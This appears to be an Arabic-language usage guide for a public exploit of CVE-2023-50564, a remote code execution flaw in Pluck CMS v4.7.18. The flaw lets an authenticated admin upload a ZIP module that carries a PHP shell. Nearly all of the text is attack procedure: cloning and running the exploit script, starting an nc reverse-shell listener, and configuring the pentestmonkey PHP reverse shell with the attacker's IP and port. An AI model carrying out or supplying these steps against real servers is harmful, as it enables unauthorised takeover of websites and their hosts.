
Pluck v4.7.18 - تنفيذ التعليمات البرمجية عن بُعد (RCE)
يسمح هذا الاستغلال لمسؤول مصادق في Pluck CMS v4.7.18 برفع وحدة ZIP خبيثة تحتوي على قشرة PHP، مما يؤدي إلى تنفيذ الأوامر عن بعد (RCE).
installmodulegit clone https://github.com/glynzr/CVE-2023-50564.git
cd CVE-2023-50564
pip3 install -r requirements.txt
python3 exploit.py -h
python3 exploit.py -t <target> -u <username> -pass <password> -path <path_to_php_shell> [-p <port>]
أولاً، يجب بدء مستمع القشرة العكسية على جهاز المهاجم (لا يجب إنهاء علامة التبويب هذه في الطرفية):
nc -nvlp <specify port>
ثم، قم بتنزيل قشرة PHP العكسية من https://github.com/pentestmonkey/php-reverse-shell وقم بتخصيصها وفقًا لجهاز المهاجم. (IP, المنفذ)
قم بتشغيل كود الاستغلال في علامة تبويب أخرى:
python3 exploit.py -t test.com -u admin -pass samplepassword -path ../php-reverse-shell.php